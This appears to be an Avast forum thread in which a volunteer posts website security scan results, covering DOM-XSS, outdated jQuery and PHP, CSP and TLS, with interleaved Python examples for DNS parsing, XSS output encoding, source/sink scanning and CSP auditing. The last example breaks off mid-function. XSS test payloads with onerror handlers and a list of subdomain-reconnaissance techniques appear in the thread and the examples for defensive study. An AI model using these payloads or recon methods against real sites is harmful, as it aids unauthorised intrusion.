254.242.55.65.in-addr.arpa. IN A
;ANSWER
;AUTHORITY
55.65.in-addr.arpa. 1799 IN SOA ns1.msft.net. msnhst.microsoft.com. 2019121601 7200 900 7200000 3600
;ADDITIONAL
this with toolbox google app's Dig DNS lookup.

Just as we expected: NXDOMAIN, a not registered domain or the result of some server hiccup.

Many folks never really studied DNS and the ways to manipulate DNS.
A shame really, for it is an important issue,
playing out everywhere, also in the background (Cloud, Big Tech data retrieving).

Conclusion here "Parties fail to innovate and to overhaul and that even partly",
or just call it like Americans do "sloppiness", whatever.

Info credits go to luntrus,

Visualize here: https://dnsviz.net/d/security.nl/dnssec/
also see: https://dnssec-debugger.verisignlabs.com/

polonus
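An added example (not part of the post) that builds the in-addr.arpa name for an address and reads the Dig output quoted above the way a resolver does; the parser targets the text format shown in the quote, and the interpretation follows RFC 2308:

```python
from __future__ import annotations
import ipaddress

# The Dig output quoted in the post above (toolbox.googleapps.com), embedded as sample input.
DIG_OUTPUT = """\
id 7223
opcode QUERY
rcode NXDOMAIN
flags QR RD RA
;QUESTION
254.242.55.65.in-addr.arpa. IN A
;ANSWER
;AUTHORITY
55.65.in-addr.arpa. 1799 IN SOA ns1.msft.net. msnhst.microsoft.com. 2019121601 7200 900 7200000 3600
;ADDITIONAL
"""


def reverse_name(ip: str) -> str:
    """Owner name a PTR lookup asks for: 65.55.242.254 -> 254.242.55.65.in-addr.arpa.
    (an IPv6 address yields the nibble form under ip6.arpa.)"""
    return ipaddress.ip_address(ip).reverse_pointer + "."


def parse_dig(text: str) -> dict:
    """Parse the dnspython-style text Dig prints: a header block, then ;SECTION markers,
    each section holding one question or resource record per line, fields whitespace-separated."""
    parsed: dict = {"header": {}, "QUESTION": [], "ANSWER": [], "AUTHORITY": [], "ADDITIONAL": []}
    section = "header"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):
            section = line[1:].upper()
            parsed.setdefault(section, [])
            continue
        if section == "header":
            key, _, value = line.partition(" ")
            parsed["header"][key] = value.split() if key == "flags" else value
        else:
            parsed[section].append(line.split())
    return parsed


def explain_nxdomain(parsed: dict) -> dict | None:
    """Read a negative answer as RFC 2308 describes it: NXDOMAIN says the name has no records
    of any type (so a PTR query fails just like this A query did), the SOA in AUTHORITY names
    the zone that denied it, and resolvers cache the denial for min(SOA TTL, SOA MINIMUM)."""
    header = parsed["header"]
    if header.get("rcode") != "NXDOMAIN":
        return None
    # SOA fields: owner ttl class SOA mname rname serial refresh retry expire minimum
    soa = next((rr for rr in parsed["AUTHORITY"] if len(rr) >= 11 and rr[3] == "SOA"), None)
    info = {
        "qname": parsed["QUESTION"][0][0],
        "qtype": parsed["QUESTION"][0][2],
        # no AA flag: the reply came through a recursive resolver, not straight from the zone
        "from_recursive_resolver": "AA" not in header.get("flags", []),
    }
    if soa is not None:
        info.update(zone=soa[0], primary_ns=soa[4], serial=soa[6],
                    negative_cache_ttl=min(int(soa[1]), int(soa[10])))
    return info


if __name__ == "__main__":
    result = parse_dig(DIG_OUTPUT)
    print(reverse_name("65.55.242.254"), "->", result["header"]["rcode"])
    print(explain_nxdomain(result))
```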
Title: Re: Tests and other Media topics
Post by: polonus on January 05, 2020, 06:48:16 PM
Security grade of this search engine webpage: https://www.qwant.com/
Re: https://www.shodan.io/host/194.187.168.100
See: https://webhint.io/scanner/47f3776f-d541-49f3-93c0-a8d2dfb3c168
Cookie & Security Scan report: https://webcookies.org/cookies/www.qwant.com/1128157?673125
Re: B-grade: https://observatory.mozilla.org/analyze/www.qwant.com

Errors in browser console: Refused to load the image 'hxtps://lite.qwant.com/img/v4/header/header-bg-tablet.svg?redirect=OperaMobi13.04&1539938515=' because it violates the following Content Security Policy directive: "img-src blob: 'self' s1.qwant.com s2.qwant.com s.qwant.com data: s-boards.qwant.com s-lite.qwant.com www.qwant.com".

/undefined:1 GET -https://www.qwant.com/undefined 404
Image (async)
replaceInnerHTML @ app.js?1576502819736:3
constructor @ app.js?1576502819736:3
startApplication @ bootstrap.js?1576502819736:196
(anonymous) @ bootstrap.js?1576502819736:140
b.then @ app.js?1576502819736:1
initApplication @ bootstrap.js?1576502819736:139
languageFileLoad @ bootstrap.js?1576502819736:254
load (async)
(anonymous) @ bootstrap.js?1576502819736:224

DOM-XSS issues: Results from scanning URL: -https://www.qwant.com/
Number of sources found: 2
Number of sinks found: 38

and results from scanning URL: -https://www.qwant.com/js/app.js?1576502819736
Number of sources found: 302
Number of sinks found: 1037

and results from scanning URL: -https://www.qwant.com/js/app.js?1576502819736
Number of sources found: 609
Number of sinks found: 291

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 14, 2020, 05:39:25 PM
Domain name cert checks.

Combine tests here, for instance: https://www.immuniweb.com/radar/?id=v4BmqgTP
and https://www.immuniweb.com/ssl/ & https://www.immuniweb.com/websec/
also https://www.immuniweb.com/websec/?id=U3EpLj3f (example)
and at https://moz.com/learn/seo/domain

Check crt.sh for certificate transparency scans.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 20, 2020, 06:22:32 AM
Next to testing with Retire.JS extension inside the browser or https://retire.insecurity.today/
developed by Erlend Oftedal, we can also test at DomStorm's class selector XSS at
-> https://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
Other modules are also available, handy for DOM-XSS searches for sinks and sources.
Other example test: https://domstorm.skepticfx.com/modules?id=559b066c34473500003d257b

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 20, 2020, 10:01:59 PM
To make the theoretical ideas stand out more practically - when we combine retire.JS -
domstorm repository, SNYK vulners etc., is to know how to protect against this,
especially against abuse combined with payload injectors. (XSSight abuse etc.).

In general: Defenses against XSS
What input do we trust? (browser- and client-side validation)
Does it adhere to expected patterns?
Never simply reflect untrusted data.
Applies to data within our database too.
Encoding for the output context (Java/attribute/HTML/CSS).

polonus
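As an added example (not from the post), the defence list above carried out in Python: an allow-list check first, then one encoder per output context, applied to the payload quoted earlier in this thread; the HTML fragment and the pattern are constructed:

```python
import html
import re
from urllib.parse import quote

# The DOM-XSS test payload quoted earlier in this thread (the brutelogic sinks test).
PAYLOAD = "<img src onerror=alert(3)>"


def matches_expected_pattern(value: str, pattern: str = r"[A-Za-z0-9 _.'-]{1,64}") -> bool:
    """Allow-list validation ("does it adhere to expected patterns?"). Rejecting early is the
    first layer; the encoders below are the second, because validated data is still untrusted."""
    return re.fullmatch(pattern, value) is not None


def encode_html(s: str) -> str:
    """HTML body context: the five significant characters become entities."""
    return html.escape(s, quote=True)


def encode_attr(s: str) -> str:
    """Quoted attribute context: everything except alphanumerics becomes &#xHH;,
    so a stray quote can never close the attribute."""
    return "".join(c if c.isalnum() else f"&#x{ord(c):x};" for c in s)


def encode_js(s: str) -> str:
    """JavaScript string-literal context: \\uXXXX for everything non-alphanumeric,
    which also neutralises a </script> inside the literal."""
    return "".join(c if c.isalnum() else f"\\u{ord(c):04x}" for c in s)


def encode_css(s: str) -> str:
    """CSS string context: \\HH followed by a space (the space terminates the escape)."""
    return "".join(c if c.isalnum() else f"\\{ord(c):x} " for c in s)


def encode_url(s: str) -> str:
    """URL query-parameter context: percent-encode everything, so the value cannot
    break out of its parameter or add new ones."""
    return quote(s, safe="")


def render_naive(untrusted: str) -> str:
    """What 'simply reflecting untrusted data' looks like: the payload lands in the DOM as markup."""
    return f'<div class="greet">Hello {untrusted}</div>'


def render_safe(untrusted: str) -> str:
    """The same data placed in five contexts, each with the encoder that fits that context."""
    return "\n".join([
        f'<div class="greet">Hello {encode_html(untrusted)}</div>',
        f'<input name="who" value="{encode_attr(untrusted)}">',
        f'<a href="/search?q={encode_url(untrusted)}">search again</a>',
        f"<script>var who = '{encode_js(untrusted)}';</script>",
        f"<style>.greet::after {{ content: '{encode_css(untrusted)}'; }}</style>",
    ])


if __name__ == "__main__":
    print(render_naive(PAYLOAD))
    print(render_safe(PAYLOAD))
```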
Title: Re: Tests and other Media topics
Post by: polonus on January 21, 2020, 04:25:24 PM
Re: http://research.insecurelabs.org/jquery/test/

Let us take a particular example with known abuse and analyse retirable jQuery library there.
Re: https://www.abuseipdb.com/check/195.62.29.11 *
Check that particular IP for "vulners": https://www.shodan.io/host/195.62.29.11 common OpenSSH abuse...
Site report: https://sitereport.netcraft.com/?url=http%3A%2F%2Fparagon.net.uk
We see an outdated Word Press CMS version there: WordPress Version 4.9.13
We see it has passed various reputation checks (questionable in the light of the abuse report, see above *)
Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:OK

External hosts also Google Safe Browsing approved:
Externally Linked Host   Hosting Provider   Country
-www.godaddy.com   GTT Communications Inc.   United States
-www.heg.com   Host Europe GmbH   United Kingdom
-domains.meshdigital.com   Host Europe GmbH   United Kingdom
-www.domainbox.com   Host Europe GmbH   United Kingdom
-aboutus.godaddy.net   Dosarrest Internet Security LTD   United States

For the DOM we go here: https://urlscan.io/result/4c8d465b-1577-496b-9b0c-3c768c8c3dd0

1 Retirable jQuery library: https://retire.insecurity.today/#!/scan/608243a0f733be6600ab4c37808b81dd7dfbaccd646f3cbc5fc5251850d95bfc

DOM-XSS Sinks and Sources there: Results from scanning URL: -https://www.heg.com/wp-includes/js/jquery/jquery.js?ver=1.12.4
Number of sources found: 41
Number of sinks found: 17

Sources, output that could be controlled - .top! .innerHTML= [name= .location. .name write( opener| .parent .open( .op= =top+ "top"
sinks, methods to do so, .value href= data= .src=

The SNYK results from webhint - hint #1: 'jQuery@1.12.4' has 2 known vulnerabilities (2 medium). See 'https://snyk.io/vuln/npm:jquery' for more information@ https://webhint.io/scanner/9d38081f-16c8-4085-a918-baedbc3e3c9c#category-security

We find two requests with regular content  on -https://www.heg.com/wp-includes/js/jquery/jquery.js?ver=1.12.4

Read: https://github.com/jquery/jquery/issues/2432

Also valuable info from: https://webcookies.org/cookies/www.heg.com/28887761?484748
about outdated PHP and excessive server info proliferation; X-Powered-By: PHP/5.4.44
The header exposes web server version details. These serve no purpose apart from making the life of security auditors and hackers easier, leading them straight to exploits for this particular version of the product - Server: Apache/2.2.15 (CentOS)
-> https://www.centos.org/forums/viewtopic.php?t=65285

Results of vulners webscanner extension for/on HEG website:
Quote
wXw.heg.com
Apache, headers
Not vulnerable
PHP, headers - 5.4.44 vulnerable
7.5

jQuery, headers - 1.3
Not vulnerable
jQuery, script
Not vulnerable
jQuery Migrate, script
Not vulnerable
Bootstrap, script
Not vulnerable
Font Awesome, html
Not vulnerable
Yoast SEO, html - 4.5
Not vulnerable
Wordpress - 4.9.13
Not vulnerable
2017 - Vulners.com


polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
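An added illustration, not the DOM-XSS scanner extension whose counts appear in this and earlier posts: a heuristic Python pass that counts sources and sinks in a script and flags lines where a source reaches a sink, run over a constructed sample (the regex lists and the sample script are my assumptions):

```python
from __future__ import annotations
import re

# Constructed sample script (not from any site in the thread): two safe lines, three unsafe ones.
SAMPLE_JS = """\
var q = location.search.split('=')[1];
document.getElementById('out').innerHTML = q;
document.getElementById('safe').textContent = window.name;
$('#greet').html(decodeURIComponent(location.hash.slice(1)));
eval('(' + localStorage.getItem('cfg') + ')');
"""

# Sources: places where attacker-influenced input enters the page.
SOURCES = {
    "location.*": r"\blocation\.(?:search|hash|href|pathname)\b",
    "document.*": r"\bdocument\.(?:URL|documentURI|referrer|cookie)\b",
    "window.name": r"\bwindow\.name\b",
    "web storage": r"\b(?:localStorage|sessionStorage)\.getItem\(",
    "postMessage data": r"\bevent\.data\b",
}
# Sinks: APIs that turn a string into markup, code or a navigation.
SINKS = {
    "innerHTML/outerHTML": r"\.(?:inner|outer)HTML\s*=",
    "insertAdjacentHTML": r"\.insertAdjacentHTML\(",
    "document.write": r"\bdocument\.write(?:ln)?\(",
    "eval": r"\beval\(",
    "string timer": r"\bset(?:Timeout|Interval)\(\s*['\"]",
    "jQuery html/append": r"\.(?:html|append|prepend|after|before)\(",
    "location assignment": r"\blocation(?:\.href)?\s*=[^=]",
}
TAINT_ASSIGN = re.compile(r"^\s*(?:var|let|const)\s+(\w+)\s*=")


def scan_js(js: str) -> dict:
    """Count sources and sinks per line (the numbers the thread's scanner reports) and flag
    each sink line that also reads a source, or a variable assigned from one: a crude
    single-file taint pass, so flows through functions or object properties are missed."""
    lines = js.splitlines()
    n_sources = 0
    tainted: set[str] = set()
    for line in lines:
        hits = sum(len(re.findall(p, line)) for p in SOURCES.values())
        n_sources += hits
        if hits:
            m = TAINT_ASSIGN.match(line)
            if m:
                tainted.add(m.group(1))
    n_sinks = 0
    flows = []
    for no, line in enumerate(lines, 1):
        for sink, pat in SINKS.items():
            if not re.search(pat, line):
                continue
            n_sinks += 1
            direct = any(re.search(p, line) for p in SOURCES.values())
            via = sorted(v for v in tainted if re.search(rf"\b{re.escape(v)}\b", line))
            if direct or via:
                reason = "direct source" if direct else "tainted variable " + ", ".join(via)
                flows.append((no, sink, reason))
    return {"sources": n_sources, "sinks": n_sinks, "flows": flows}


if __name__ == "__main__":
    result = scan_js(SAMPLE_JS)
    print(f"Number of sources found: {result['sources']}")
    print(f"Number of sinks found: {result['sinks']}")
    for no, sink, reason in result["flows"]:
        print(f"line {no}: {sink} <- {reason}")
```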
Title: Re: Tests and other Media topics
Post by: polonus on January 21, 2020, 11:06:57 PM
Compare malicious IP scans.

Re: https://urlhaus.abuse.ch/url/294136/
IP server info: https://www.shodan.io/host/108.58.8.186
together with Netcraft's site report: https://sitereport.netcraft.com/?url=ool-6c3a08ba.static.optonline.net
Confirmation of scanning and Mirai-like infestations: https://viz.greynoise.io/ip/108.58.8.186

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2020, 06:14:55 AM
Testing PHP - http://evuln.com/tools/php-security/
There are also free applications, so I won't give that address for we don't wanna break those  ;)
Also: https://phpstan.org/  as an online tool.
Example test on index.php: https://phpstan.org/r/2976723a-53b1-4698-8984-ccbbdee9b292

https://www.quora.com/How-do-I-view-a-PHP-source-code-of-a-website-just-like-we-see-the-HTML-and-other-codes

Sucuri also has resources: https://wordpress.org/support/topic/sucuri-auditqueue-php-and-other-files/
Re: https://www.unphp.net/decode/788b15af31089576dfcc553a4eddedd0/

Vulners extension for this site -forum.avast.com gives vuln. PHP.headers 5.4.49   7.5
-> https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/opbyp-1/PHP-PHP.html

Often PHP could mean a "can of worms", specifically outside the kernel source of PHP based CMS like Word Press etc.

General interpretation of web security: https://infosec.mozilla.org/guidelines/web_security

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 04, 2020, 05:40:36 PM
L.S.

Linting for javascript errors and flaws, e.g. javascript-validation.
Combine with results from the vulners web scanner extension, Zen Mate Web Firewall extension &
Javascript Error Notifier extension and shodan extension for eventual website server info.

Using an online Javascript Validator: http://beautifytools.com/javascript-validator.php
Tested:  -https://refugiodocapitao.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 3
Number of sinks found: 0
Linting produced:
Line   Col   Errors
5   1   Missing semicolon.
0   0   Use the function form of "use strict".
26   94   Missing semicolon.
31   146   Use '===' to compare with 'false'.

Scanned for retirable jQuery library: -https://refugiodocapitao.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Detected libraries:
jquery-migrate - 1.4.1 : -https://refugiodocapitao.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
No vulnerable libraries found

Line   Col   Errors
222   58   Unnecessary semicolon.
258   18   'options' is defined but never used.
298   22   'e' is defined but never used.
308   28   'e' is defined but never used.
360   35   'options' is defined but never used.
399   1   'new_max' is defined but never used.
424   53   'options' is defined but never used.
475   1   'whCustom' is defined but never used.
530   22   'index' is defined but never used.
460   1   'html_el' is defined but never used.
464   1   'full_slider' is defined but never used.
651   8   Use '===' to compare with '0'.
695   27   'direction' is defined but never used.
751   58   Expected an assignment or function call and instead saw an expression.
760   9   ['jswing'] is better written in dot notation.
760   30   ['swing'] is better written in dot notation.
794   62   A leading decimal point can be confused with a dot: '.3'.
801   62   A leading decimal point can be confused with a dot: '.3'.
808   65   A leading decimal point can be confused with a dot: '.3'.
811   22   A leading decimal point can be confused with a dot: '.5'.
812   71   A leading decimal point can be confused with a dot: '.5'.
834   41   A leading decimal point can be confused with a dot: '.75'.
836   44   A leading decimal point can be confused with a dot: '.9375'.
838   47   A leading decimal point can be confused with a dot: '.984375'.
842   70   A leading decimal point can be confused with a dot: '.5'.
843   60   A leading decimal point can be confused with a dot: '.5'.
843   67   A leading decimal point can be confused with a dot: '.5'.
781   49   Use '===' to compare with '0'.
784   6   Use '===' to compare with '0'.
794   6   Use '===' to compare with '0'.
795   33   's' is already defined.
796   10   's' is already defined.
801   6   Use '===' to compare with '0'.
802   33   's' is already defined.
803   10   's' is already defined.
808   6   Use '===' to compare with '0'.
809   33   's' is already defined.
810   10   's' is already defined.
815   7   Use '===' to compare with 'undefined'.
819   7   Use '===' to compare with 'undefined'.
823   7   Use '===' to compare with 'undefined'.
906   50   'delay' is defined but never used.
1173   17   Use '===' to compare with 'true'.
1289   5   'win' is defined but never used.
1186   22   'avia_is_mobile' is not defined.

Then we are gonna compare to detected sinks and sources via a DOM XSS scan:

But here we found sources and sinks in retirable code:
https://retire.insecurity.today/#!/scan/618f3f67a7d9c4e74e7f1378ebe74d92b11d17db042b56d657463ceec95256d0

Detected sources and sinks: .parent, .top, .location, &  location.href. =

Re: https://domstorm.skepticfx.com/ ->https://domstorm.skepticfx.com/modules?id=56b4dfde108b7c00007363ac
Pentest tool like:  https://github.com/lwzSoviet/NoXss

jQuery versions with known weaknesses
Bug 9521 - $("#<img src=x onerror=...>")
Bug 11290 - $("element[attribute='<img src=x onerror=...>'")
jQuery issue 2432 - 3rd party $.get() auto executes if content type is text/javascript
jQuery issue 11974 - parseHTML executes inline scripts like event handlers

enjoy, my good friends, enjoy.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 06, 2020, 11:24:22 PM
Firefox is gonna block websites with T.L.S. 1.0 & 1.1. coming March.
Re: https://hacks.mozilla.org/2020/02/its-the-boot-for-tls-1-0-and-tls-1-1/

Check TLS here: https://www.cdn77.com/tls-test
or here: http://ssl-checker.online-domain-tools.com/
and here: https://www.checktls.com/

Also consider: https://geekflare.com/ssl-test-certificate  or  https://mxtoolbox.com/problem/smtp/smtp-tls
-> https://www.checktls.com/TestReceiver?LEVEL=DETAIL&EMAIL=    (=domain name of mail server).

polonus

Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2020, 02:59:45 PM
Interesting test here: https://hidester.com/webrtc-ip-leak-test/
and more at that site where that came from.
Redirect checker and many other tools here: http://www.internetofficer.com/seo-tool/redirect-check/

Check websites for trackers (check Ghostery & ZenMate Web Firewall extension) here:
(random example): https://whotracks.me/websites/rijmwoordenboek.nl.html

URL analysis: www.theurlanalyzer.com  &  against threats: https://csi.forcepoint.com/  (5 reports a day free access)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2020, 10:24:31 PM
Establish ad-tracking from three scan sources:
1. https://whotracks.me/websites/rijmwoordenboek.nl.html
2. https://urlscan.io/result/a317a0a7-0228-4827-94ed-a9c080b3f0ea#transactions
3. https://rijmwoordenboek.nl/
Privacy impact = E-grade status.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 20, 2020, 09:52:38 PM
Check subdomain enumeration: search query = site:example.com
& https://pentest-tools.com/information-gathering/find-subdomains-of-domain#
or  https://www.ultratools.com/
also  https://securitytrails.com/dns-trails

Quote
subdomain enumeration methods
Scraping
Brute-force
Alterations & permutations of already known subdomains
Online DNS tools
SSL certificates
Certificate Transparency
Search engines
Public datasets
DNS aggregators
Git repositories
Text parsing (HTML, JavaScript, documents…)
VHost discovery
ASN discovery
Reverse DNS
Zone transfer (AXFR)
DNSSEC zone walking
DNS cache snooping
Content-Security-Policy HTTP headers
Sender Policy Framework (SPF) records
Subject Alternate Name (SAN)
info source credits go to SecOff.

polonus


Title: Re: Tests and other Media topics
Post by: polonus on March 03, 2020, 10:43:34 PM
Because of a bug Let's Encrypt revokes 3.000.000 certificates:
Read: https://community.letsencrypt.org/t/revoking-certain-certificates-on-march-4/114864

Test here if your cert was being revoked: https://checkhost.unboundtest.com/

Later they decided they would not do that, read https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591
(really a good thing, while everything went right except for the CAA authentication)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 07, 2020, 03:25:54 PM
L.S.

On this Australian website I found a tracker named Tealium: -https://www.news.com.au/

Checked @whotracks.me: https://whotracks.me/trackers/tealium.html
& https://whotracks.me/websites/instagram.com.html

Also consider: https://webcookies.org/cookies/www.news.com.au/2208692?353391

CSP policy
Quote
block-all-mixed-content;
style-src https: 'unsafe-inline';
script-src https: blob: 'unsafe-inline' 'unsafe-eval';
img-src https: data:;
frame-src https:;
with high risk settings in script-src:
* https: URI in script-src allows the execution of unsafe scripts.
* blob: (no warning)
* 'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
* 'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
&
object-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
Also check policy using  https://csp-evaluator.withgoogle.com/ ->
Quote
[ok]    block-all-mixed-content
[ok]    style-src: https: 'unsafe-inline'
[error] script-src: Host whitelists can frequently be bypassed. Consider using 'strict-dynamic' in combination with CSP nonces or hashes.
        [error] https: URI in script-src allows the execution of unsafe scripts.
        [ok]    blob:
        [error] 'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
        [note]  'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
[ok]    img-src: https: data:
[ok]    frame-src: https:
[error] object-src [missing]: Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
[info]  require-trusted-types-for [missing]: Consider requiring Trusted Types for scripts to lock down DOM XSS injection sinks. You can do this by adding "require-trusted-types-for 'script'" to your policy.

Blocked for me in the browser are -resources.newscdn.com.au & -multitools.newscdn.com.au, -tags.tiqcdn.com, -e.infogram.com &
-tags.news.com.au.

Re: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3Lm57d3MuXl1tLnx1YA%3D%3D~enc

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on March 07, 2020, 03:29:49 PM
I venture to say that almost all news sites you visit will probably at least try to track your location.
The question remains, what are they doing with the information they've collected?
Title: Re: Tests and other Media topics
Post by: polonus on March 07, 2020, 03:43:56 PM
Hi bob3160,

Indeed, bob3160. It is not so much they track and collect (y)our data. They apparently are sitting on loads and loads of data.
More interesting is the answer to "To do what?". Sell it to the highest bidder and that can be both commerce and your government.
Hopefully it does not land in some form at the wrong competitor's or the wrong state agent's desks.

It is not so much they do it, it is more end-users being aware that this is going on inside their browsers "at the other side of their screens" and that 7/24/365 all year round, when and where they are mostly unaware of it. OK when they asked you to participate so they could come up with interesting ads at your doorstep, as the flyer-boy did in the past.

And then you always have adblockers and script-blockers to stem out the worst of it.  ;)  :)

Thing for us here is that ads sometimes come malware-laden and then you like to cling to that ad-blocker of choice,
no matter how many times you are begged to take these ad-blocking-visors down.
Or with a pay wall you stop visiting such a nagging page altogether.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 08, 2020, 12:27:01 AM
Do not fall for a PHISH? Normally avast and avast secure browser and avast browser extension will keep you from visiting existing PHISHING websites, but we can also scan or be alerted.
Over 5,000 PHISHING sites reported every day here: https://openphish.com/
And recent submissions here: https://www.phishtank.com/
Cert Transparency and find a PHISH before it finds you: https://certstream.calidog.io/ https://phishfinder.io/

polonus

Title: Re: Tests and other Media topics
Post by: polonus on March 08, 2020, 02:06:09 PM
Brave New World scenario: biohackers encoded computer malware inside DNA.
Read: https://www.wired.com/story/malware-dna-hack/

Time to explore some common ways of obfuscation malcreants use from day to day:
Read: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0

The tools: https://turgensec.com/Obscurity/Obscurity.html

Forewarned is forearmed,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 14, 2020, 02:33:17 PM
Many of us, sitting at home now, have ample time on our hands to test, lint and fuzz JavaScript code:
Explore online tools at: https://webtoolkitonline.com/

Very interesting for those into JavaScript  security and all others that take an interest in the subject.

Just an example from a Vulners Webscanner extension loaded content.js script,
content.js via Ctrl+Shift+I (inside the browser console).

Let's go. Following the yellow alert triangle we see:
We can use either
JavaScript Tester online: https://webtoolkitonline.com/javascript-tester.html
Also: https://codebeautify.org/jsvalidate
via the latter tool ->

Validation of a simple vulners script against regexp->
Quote
#   line  col  message
1   1     1    'console' was used before it was defined.
    source:    console.log('[VULNERS] Init');
2   3     1    'v_browser' was used before it was defined.
3   3     57   'rules' was used before it was defined.
4   3     56   Unexpected '('.
5   3     65   Missing space between '=' and '>'.
6   3     65   Unexpected '>'.
    source:    v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {


Quite some task but very instructing. Pay attention to certain patterns and learn to recognize those patterns.
You learn to hear the JavaScript grass grow with your ear stuck (stack?) firmly unto the ground. ( } >;).

Regards to everyone here. A good week and most of all stay in good health ye all,
Info credits go to luntrus

polonus (volunteer 3rd party cold recon (JavaScript)-security website analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 15, 2020, 04:29:05 PM
Seen in the light of COVID-19 precaution measures, we remind that all scans can be  safely run online without any human contact or paperwork. ;) Keep your devices, keyboards and screens clean and away from others.

Scan website security headers. Often malicious websites have low scores in this respect,
the following one has a D-score: https://securityheaders.com/?q=https%3A%2F%2Fonedrive.live.com&followRedirects=on

This site is spreading malware, see: https://urlhaus.abuse.ch/url/325253/   

Also consider a bewildering A score here: https://www.immuniweb.com/websec/?id=N1Mnj70i
Compare to: https://webcookies.org/ssl/report/onedrive.live.com/193599

Missing headers:
Quote
Missing Headers
Content-Security-Policy   Content Security Policy is an effective measure to protect your site from XSS attacks. By whitelisting sources of approved content, you can prevent the browser from loading malicious assets.

X-Frame-Options   X-Frame-Options tells the browser whether you want to allow your site to be framed or not. By preventing a browser from framing your site you can defend against attacks like clickjacking. Recommended value "X-Frame-Options: SAMEORIGIN".

Referrer-Policy   Referrer Policy is a new header that allows a site to control how much information the browser includes with navigations away from a document and should be set by all sites.

Feature-Policy   Feature Policy is a new header that allows a site to control which features and APIs can be used in the browser.

polonus
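The two evaluator verdicts quoted in this thread (the news.com.au CSP on March 7 and the securityheaders.com "Missing Headers" list here) can be reproduced offline. What follows is an added example written for this thread, not code from csp-evaluator, securityheaders.com or any site mentioned: it parses a CSP string, applies the same rules those tools report (scheme sources and 'unsafe-inline' in script-src, missing object-src, allowlists without 'strict-dynamic') and lists the security headers absent from a response-header dict. The header sample is constructed, and the stricter policy is my suggestion, not one any site publishes.

```python
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")
BROAD_SOURCES = {"*", "https:", "http:", "data:"}

# Constructed response headers for a site that would score badly: CSP, X-Frame-Options,
# Referrer-Policy and Permissions-Policy are all absent.
SAMPLE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000",
    "X-Content-Type-Options": "nosniff",
}
# The policy quoted in the March 7 post, and a nonce-based alternative (my suggestion).
WEAK_CSP = ("block-all-mixed-content; style-src https: 'unsafe-inline'; "
            "script-src https: blob: 'unsafe-inline' 'unsafe-eval'; "
            "img-src https: data:; frame-src https:")
STRICT_CSP = ("object-src 'none'; base-uri 'none'; "
              "script-src 'nonce-R4nd0mPerResponse' 'strict-dynamic' https: 'unsafe-inline'")

RECOMMENDED = {
    "content-security-policy": "restrict script sources; see audit_csp()",
    "x-frame-options": "SAMEORIGIN, or frame-ancestors in the CSP",
    "strict-transport-security": "max-age=31536000; includeSubDomains",
    "x-content-type-options": "nosniff",
    "referrer-policy": "strict-origin-when-cross-origin",
    "permissions-policy": "disable unused features (successor of Feature-Policy)",
}


def parse_csp(policy):
    """Directive name -> list of source expressions (first occurrence of a directive wins)."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def audit_csp(policy):
    """Return (severity, directive, message) findings in the style of csp-evaluator."""
    d = parse_csp(policy)
    findings = []
    script = d.get("script-src", d.get("default-src"))
    if script is None:
        findings.append(("error", "script-src", "neither script-src nor default-src is set"))
    else:
        srcs = [s.lower() for s in script]
        nonce_or_hash = any(s.startswith(NONCE_OR_HASH) for s in srcs)
        strict_dynamic = "'strict-dynamic'" in srcs
        # CSP2+ browsers ignore 'unsafe-inline' once a nonce or hash is present, so there it
        # is only a fallback for old browsers.
        if "'unsafe-inline'" in srcs and not nonce_or_hash:
            findings.append(("error", "script-src",
                             "'unsafe-inline' allows in-page scripts and event handlers"))
        if "'unsafe-eval'" in srcs:
            findings.append(("info", "script-src",
                             "'unsafe-eval' allows eval()/Function() on injected strings"))
        # Browsers that support 'strict-dynamic' ignore host and scheme sources.
        if not strict_dynamic:
            for s in srcs:
                if s in BROAD_SOURCES:
                    findings.append(("error", "script-src", f"{s} allows scripts from any host"))
            hosts = [s for s in srcs if not s.startswith("'")
                     and s not in BROAD_SOURCES and s != "blob:"]
            if hosts:
                findings.append(("warn", "script-src",
                                 "host allowlists are frequently bypassed (JSONP, Angular "
                                 "endpoints); prefer 'strict-dynamic' with nonces or hashes"))
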